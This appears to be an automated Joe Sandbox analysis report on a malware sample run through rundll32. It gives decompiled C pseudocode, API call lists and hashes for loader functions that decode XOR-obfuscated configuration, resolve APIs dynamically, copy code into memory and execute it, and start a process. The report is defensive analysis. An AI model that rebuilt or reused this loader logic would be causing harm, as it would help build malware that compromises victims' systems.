                                          0x04c0af4a
                                          0x04c0af52
                                          0x04c0af67
                                          0x04c0af6c
                                          0x00000000
                                          0x00000000
                                          0x04c0af6c
                                          0x00000000
                                          0x04c0af52
                                          0x04c0af40
                                          0x04c0af3b
                                          0x04c0ae81
                                          0x04c0ae88
                                          0x04c0ae98
                                          0x04c0aea1
                                          0x04c0aea5
                                          0x04c0aee8
                                          0x04c0aef4
                                          0x04c0af1d
                                          0x04c0aef6
                                          0x04c0aefa
                                          0x04c0af00
                                          0x04c0af08
                                          0x04c0af0a
                                          0x04c0af0d
                                          0x04c0af13
                                          0x04c0af15
                                          0x04c0af15
                                          0x04c0af08
                                          0x04c0aefa
                                          0x00000000
                                          0x04c0aef4
                                          0x04c0aead
                                          0x04c0aeb0
                                          0x04c0aeb7
                                          0x04c0aec7
                                          0x04c0aeca
                                          0x04c0aeda
                                          0x00000000
                                          0x04c0aee0
                                          0x04c0aec1
                                          0x04c0aec5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04c0aec5
                                          0x04c0ae92
                                          0x04c0ae96
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04c0ae96
                                          0x04c0ae6f
                                          0x04c0ae73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04C0AE1E
                                          • LoadLibraryA.KERNEL32(?), ref: 04C0AE9B
                                          • GetLastError.KERNEL32 ref: 04C0AEA7
                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04C0AEDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                          • String ID: $
                                          • API String ID: 948315288-3993045852
                                          • Opcode ID: a99387da01df2df7f9b90e7fe736f1571de9d455e215deebb9fb5c201f212eaf
                                          • Instruction ID: 871665706ff39d57a4b411790a7d39b6b080ba919042d996c03f5cb0be814f08
                                          • Opcode Fuzzy Hash: a99387da01df2df7f9b90e7fe736f1571de9d455e215deebb9fb5c201f212eaf
                                          • Instruction Fuzzy Hash: 7F815DB5A00305AFDB14CF99D880BAEB7F6FF58314F158129EA05E7280EB75EA45CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C030FC, Relevance: 15.1, APIs: 10, Instructions: 102stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 56%
                                          			E04C030FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0x4c0d33c; // 0x5589bb0
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E04C09810(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0x4c0c19c;
				}
				_t44 = E04C047E1(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E04C058BE(lstrlenW(0x4c0eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x4c0eb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0x4c0d2a4; // 0x97a5a8
						_t73 =  *0x4c0d11c; // 0x4c0abc9
						_t18 = _t75 + 0x4c0eb38; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E04C058BE(lstrlenW(0x4c0ec58) + _a8 + _t57 + _t58 + lstrlenW(0x4c0ec58) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E04C0147E(_v16);
						} else {
							_t64 =  *0x4c0d2a4; // 0x97a5a8
							_t31 = _t64 + 0x4c0ec58; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E04C0147E(_v8);
				}
				return _v20;
			}


























                                          0x04c030fc
                                          0x04c03104
                                          0x04c0310a
                                          0x04c0311a
                                          0x04c0311d
                                          0x04c03122
                                          0x04c03127
                                          0x04c03129
                                          0x04c03129
                                          0x04c03132
                                          0x04c03137
                                          0x04c0313c
                                          0x04c03142
                                          0x04c0314c
                                          0x04c03155
                                          0x04c0315c
                                          0x04c0316a
                                          0x04c0317c
                                          0x04c03181
                                          0x04c03186
                                          0x04c0318f
                                          0x04c03198
                                          0x04c031a1
                                          0x04c031af
                                          0x04c031b7
                                          0x04c031bc
                                          0x04c031bf
                                          0x04c031ca
                                          0x04c031e1
                                          0x04c031e5
                                          0x04c03218
                                          0x04c031e7
                                          0x04c031ea
                                          0x04c031f2
                                          0x04c031fd
                                          0x04c03205
                                          0x04c0320d
                                          0x04c03211
                                          0x04c03211
                                          0x04c031e5
                                          0x04c03220
                                          0x04c03225
                                          0x04c0322c

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04C03111
                                          • lstrlen.KERNEL32(00000000,80000002), ref: 04C0314C
                                          • lstrlen.KERNEL32(?), ref: 04C03155
                                          • lstrlen.KERNEL32(00000000), ref: 04C0315C
                                          • lstrlenW.KERNEL32(80000002), ref: 04C0316A
                                          • lstrlenW.KERNEL32(04C0EB38), ref: 04C03173
                                          • lstrlen.KERNEL32(?), ref: 04C031B7
                                          • lstrlen.KERNEL32(?), ref: 04C031BF
                                          • lstrlenW.KERNEL32(?), ref: 04C031CA
                                          • lstrlenW.KERNEL32(04C0EC58), ref: 04C031D3
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 2535036572-0
                                          • Opcode ID: e992a0425b3ee3bf6a520c20cc42309ca5f6813ab6445f8e3cb61ed448a0766a
                                          • Instruction ID: 9b2916a66c43af7c6f9edcd68b373df22585e38b0e6a7f3cf5627f965ec4b6da
                                          • Opcode Fuzzy Hash: e992a0425b3ee3bf6a520c20cc42309ca5f6813ab6445f8e3cb61ed448a0766a
                                          • Instruction Fuzzy Hash: AB316B76D00109FFDF11AFA4CC4499EBFBAEF48308B068461E904A7261DB35EA51DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C01493, Relevance: 12.1, APIs: 8, Instructions: 110librarymemoryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E04C01493(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t57;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;

				_t1 = __eax + 0x14; // 0x74183966
				_t67 =  *_t1;
				_t36 = E04C057D8(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
				_t39 = _v12(_v12);
				_v8 = _t39;
				if(_t39 == 0 && ( *0x4c0d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t46 =  *0x4c0d2a4; // 0x97a5a8
					_t18 = _t46 + 0x4c0e3e6; // 0x73797325
					_t66 = E04C077E6(_t18);
					if(_t66 == 0) {
						_v8 = 8;
					} else {
						_t49 =  *0x4c0d2a4; // 0x97a5a8
						_t19 = _t49 + 0x4c0e747; // 0x5588cef
						_t20 = _t49 + 0x4c0e0af; // 0x4e52454b
						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t69 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04C0684E();
							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E04C0684E();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4c0d238, 0, _t66);
					}
				}
				_t68 = _v16;
				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
				E04C0147E(_t68);
				goto L12;
			}



















                                          0x04c0149b
                                          0x04c0149b
                                          0x04c014aa
                                          0x04c014b1
                                          0x04c014b6
                                          0x04c015c6
                                          0x04c015cd
                                          0x04c015cd
                                          0x04c014c5
                                          0x04c014d0
                                          0x04c014d3
                                          0x04c014d8
                                          0x04c014ed
                                          0x04c014f3
                                          0x04c014f4
                                          0x04c014f7
                                          0x04c014fd
                                          0x04c01500
                                          0x04c01505
                                          0x04c0150d
                                          0x04c01519
                                          0x04c0151d
                                          0x04c015ad
                                          0x04c01523
                                          0x04c01523
                                          0x04c01528
                                          0x04c0152f
                                          0x04c01543
                                          0x04c01547
                                          0x04c01596
                                          0x04c01549
                                          0x04c0154a
                                          0x04c01551
                                          0x04c0156a
                                          0x04c0156c
                                          0x04c01570
                                          0x04c01577
                                          0x04c01591
                                          0x04c01579
                                          0x04c01582
                                          0x04c01587
                                          0x04c01587
                                          0x04c01577
                                          0x04c015a5
                                          0x04c015a5
                                          0x04c0151d
                                          0x04c015b4
                                          0x04c015bd
                                          0x04c015c1
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04C057D8: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04C014AF,?,?,?,?,00000000,00000000), ref: 04C057FD
                                            • Part of subcall function 04C057D8: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04C0581F
                                            • Part of subcall function 04C057D8: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04C05835
                                            • Part of subcall function 04C057D8: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04C0584B
                                            • Part of subcall function 04C057D8: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04C05861
                                            • Part of subcall function 04C057D8: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04C05877
                                          • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 04C014C5
                                          • memset.NTDLL ref: 04C01500
                                            • Part of subcall function 04C077E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,04C0333A,73797325), ref: 04C077F7
                                            • Part of subcall function 04C077E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04C07811
                                          • GetModuleHandleA.KERNEL32(4E52454B,05588CEF,73797325), ref: 04C01536
                                          • GetProcAddress.KERNEL32(00000000), ref: 04C0153D
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C015A5
                                            • Part of subcall function 04C0684E: GetProcAddress.KERNEL32(36776F57,04C0935F), ref: 04C06869
                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04C01582
                                          • CloseHandle.KERNEL32(?), ref: 04C01587
                                          • GetLastError.KERNEL32(00000001), ref: 04C0158B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
                                          • String ID:
                                          • API String ID: 478747673-0
                                          • Opcode ID: ec68a8476f536ebfc89e50e3516107082cc076dc2dc8239ab5a0bef5667a15fd
                                          • Instruction ID: 9a573e5d912979ab61e946595618d6754651dabdfb3d0931f5728188664d1884
                                          • Opcode Fuzzy Hash: ec68a8476f536ebfc89e50e3516107082cc076dc2dc8239ab5a0bef5667a15fd
                                          • Instruction Fuzzy Hash: 053130B6900208AFEB21AFE4DC88E9EBBBDEF08344F058565E606A7151D735AE44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C04D2C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 63%
                                          			E04C04D2C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4c0d2a4; // 0x97a5a8
				_t1 = _t9 + 0x4c0e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E04C06027(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E04C058BE(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04C06F33(_t34, _t41, _a8);
						E04C0147E(_t41);
						_t42 = E04C04759(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04C0147E(_t36);
							_t36 = _t42;
						}
						_t43 = E04C04858(_t36, _t33);
						if(_t43 != 0) {
							E04C0147E(_t36);
							_t36 = _t43;
						}
					}
					E04C0147E(_t28);
				}
				return _t36;
			}














                                          0x04c04d2c
                                          0x04c04d2f
                                          0x04c04d30
                                          0x04c04d38
                                          0x04c04d3f
                                          0x04c04d46
                                          0x04c04d4a
                                          0x04c04d50
                                          0x04c04d57
                                          0x04c04d5c
                                          0x04c04d6e
                                          0x04c04d72
                                          0x04c04d76
                                          0x04c04d7c
                                          0x04c04d81
                                          0x04c04d91
                                          0x04c04d93
                                          0x04c04daa
                                          0x04c04dae
                                          0x04c04db1
                                          0x04c04db6
                                          0x04c04db6
                                          0x04c04dbf
                                          0x04c04dc3
                                          0x04c04dc6
                                          0x04c04dcb
                                          0x04c04dcb
                                          0x04c04dc3
                                          0x04c04dce
                                          0x04c04dce
                                          0x04c04dd9

                                          APIs
                                            • Part of subcall function 04C06027: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04C04D46,253D7325,00000000,00000000,74ECC740,?,?,04C052FE,?), ref: 04C0608E
                                            • Part of subcall function 04C06027: sprintf.NTDLL ref: 04C060AF
                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04C052FE,?,055895B0), ref: 04C04D57
                                          • lstrlen.KERNEL32(?,?,?,04C052FE,?,055895B0), ref: 04C04D5F
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • strcpy.NTDLL ref: 04C04D76
                                          • lstrcat.KERNEL32(00000000,?), ref: 04C04D81
                                            • Part of subcall function 04C06F33: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04C04D90,00000000,?,?,?,04C052FE,?,055895B0), ref: 04C06F4A
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04C052FE,?,055895B0), ref: 04C04D9E
                                            • Part of subcall function 04C04759: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04C04DAA,00000000,?,?,04C052FE,?,055895B0), ref: 04C04763
                                            • Part of subcall function 04C04759: _snprintf.NTDLL ref: 04C047C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                          • String ID: =
                                          • API String ID: 2864389247-1428090586
                                          • Opcode ID: 0d79acf6eff87e1f7b4b1a167bae5d0494dd79593c3dde3b5cb18a70ec55db35
                                          • Instruction ID: 70aa244ce3aa31f12c639149f1583cf0d889c557edc11350a33ab6c56c0be540
                                          • Opcode Fuzzy Hash: 0d79acf6eff87e1f7b4b1a167bae5d0494dd79593c3dde3b5cb18a70ec55db35
                                          • Instruction Fuzzy Hash: 9A112977A012257757267BF89C84C6F7AAFCE457683068255FB04AB180CE34FE01ABE4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C098F7, Relevance: 9.2, APIs: 6, Instructions: 187memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E04C098F7(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				signed int _t18;
				signed int _t23;
				void* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t41;
				void* _t43;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t54;
				signed int _t58;
				signed int _t62;
				signed int _t66;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t80 = __edi;
				_t72 = __ecx;
				_t69 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x4c0d2a0; // 0x59935a40
				if(E04C096D5( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
					 *0x4c0d2d0 = _v12;
				}
				_t23 =  *0x4c0d2a0; // 0x59935a40
				if(E04C096D5( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
					_t28 = 2;
					return _t28;
				} else {
					_push(_t69);
					_t70 = _v12;
					_push(_t83);
					_push(_t80);
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t66 =  *0x4c0d2a0; // 0x59935a40
						_t29 = E04C010CA(_t72, _t70, _t66 ^ 0x48b4463f);
					}
					if(_t29 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0x4c0d240 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t62 =  *0x4c0d2a0; // 0x59935a40
						_t30 = E04C010CA(_t72, _t70, _t62 ^ 0x11ba0dc3);
					}
					if(_t30 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0x4c0d244 = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t58 =  *0x4c0d2a0; // 0x59935a40
						_t31 = E04C010CA(_t72, _t70, _t58 ^ 0x01dd0365);
					}
					if(_t31 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x4c0d248 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t54 =  *0x4c0d2a0; // 0x59935a40
						_t32 = E04C010CA(_t72, _t70, _t54 ^ 0x3cf823ca);
					}
					if(_t32 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x4c0d004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t50 =  *0x4c0d2a0; // 0x59935a40
						_t33 = E04C010CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
					}
					if(_t33 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x4c0d02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t46 =  *0x4c0d2a0; // 0x59935a40
						_t34 = E04C010CA(_t72, _t70, _t46 ^ 0x163b337e);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t43 = 0x10;
						_t44 = E04C0A2EF(_t43);
						if(_t44 != 0) {
							_push(_t44);
							E04C09B10();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t41 =  *0x4c0d2a0; // 0x59935a40
						_t35 = E04C010CA(_t72, _t70, _t41 ^ 0x89f501b6);
					}
					if(_t35 != 0 && E04C0A2EF(0, _t35) != 0) {
						_t86 =  *0x4c0d324; // 0x55895b0
						E04C04C3A(_t86 + 4, _t39);
					}
					HeapFree( *0x4c0d238, 0, _t70);
					return 0;
				}
			}





























                                          0x04c098f7
                                          0x04c098f7
                                          0x04c098f7
                                          0x04c098f7
                                          0x04c098fa
                                          0x04c098fb
                                          0x04c098fc
                                          0x04c09916
                                          0x04c09924
                                          0x04c09924
                                          0x04c09929
                                          0x04c09943
                                          0x04c09ad2
                                          0x04c09ad4
                                          0x04c09949
                                          0x04c09949
                                          0x04c0994a
                                          0x04c0994d
                                          0x04c0994e
                                          0x04c09953
                                          0x04c09969
                                          0x04c09955
                                          0x04c09955
                                          0x04c09962
                                          0x04c09962
                                          0x04c09973
                                          0x04c09975
                                          0x04c0997f
                                          0x04c09984
                                          0x04c09984
                                          0x04c0997f
                                          0x04c0998b
                                          0x04c099a1
                                          0x04c0998d
                                          0x04c0998d
                                          0x04c0999a
                                          0x04c0999a
                                          0x04c099a5
                                          0x04c099a7
                                          0x04c099b1
                                          0x04c099b6
                                          0x04c099b6
                                          0x04c099b1
                                          0x04c099bd
                                          0x04c099d3
                                          0x04c099bf
                                          0x04c099bf
                                          0x04c099cc
                                          0x04c099cc
                                          0x04c099d7
                                          0x04c099d9
                                          0x04c099e3
                                          0x04c099e8
                                          0x04c099e8
                                          0x04c099e3
                                          0x04c099ef
                                          0x04c09a05
                                          0x04c099f1
                                          0x04c099f1
                                          0x04c099fe
                                          0x04c099fe
                                          0x04c09a09
                                          0x04c09a0b
                                          0x04c09a15
                                          0x04c09a1a
                                          0x04c09a1a
                                          0x04c09a15
                                          0x04c09a21
                                          0x04c09a37
                                          0x04c09a23
                                          0x04c09a23
                                          0x04c09a30
                                          0x04c09a30
                                          0x04c09a3b
                                          0x04c09a3d
                                          0x04c09a47
                                          0x04c09a4c
                                          0x04c09a4c
                                          0x04c09a47
                                          0x04c09a53
                                          0x04c09a69
                                          0x04c09a55
                                          0x04c09a55
                                          0x04c09a62
                                          0x04c09a62
                                          0x04c09a6d
                                          0x04c09a6f
                                          0x04c09a72
                                          0x04c09a73
                                          0x04c09a7a
                                          0x04c09a7c
                                          0x04c09a7d
                                          0x04c09a7d
                                          0x04c09a7a
                                          0x04c09a84
                                          0x04c09a9a
                                          0x04c09a86
                                          0x04c09a86
                                          0x04c09a93
                                          0x04c09a93
                                          0x04c09a9e
                                          0x04c09aac
                                          0x04c09ab6
                                          0x04c09ab6
                                          0x04c09ac3
                                          0x04c09acf
                                          0x04c09acf

                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04C04A8B), ref: 04C0997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04C04A8B), ref: 04C099AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04C04A8B), ref: 04C099DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04C04A8B), ref: 04C09A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04C04A8B), ref: 04C09A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04C04A8B), ref: 04C09AC3
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 372a38bedbf7dad8b2cc9b00e7f231bc025c5796e406316d123f845ac0f80646
                                          • Instruction ID: d443b43c0d22b61201c2a5ec07efddca335a04f063161ecae660106ae322eabe
                                          • Opcode Fuzzy Hash: 372a38bedbf7dad8b2cc9b00e7f231bc025c5796e406316d123f845ac0f80646
                                          • Instruction Fuzzy Hash: 8651A7B4B00104EFD710EBB9DD84F6B72EFE788704B698925A506D3185EA35FE40D720
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C0135B, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 04C013B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 04C013C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 04C013DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C01443
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C01452
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C0145D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 4c5555779accdf4c2e574dfaffda8452e7de40f28729263e6d16de95050de155
                                          • Instruction ID: 95d0b769dbfc6a9c9b123c1f95e04348bb2553d63ef475dbed7b8b472bda7659
                                          • Opcode Fuzzy Hash: 4c5555779accdf4c2e574dfaffda8452e7de40f28729263e6d16de95050de155
                                          • Instruction Fuzzy Hash: 6E416235900609AFDB01DFFCD84469FB7BAEF49304F158425E914EB160DA72EE46CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C057D8, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04C057D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
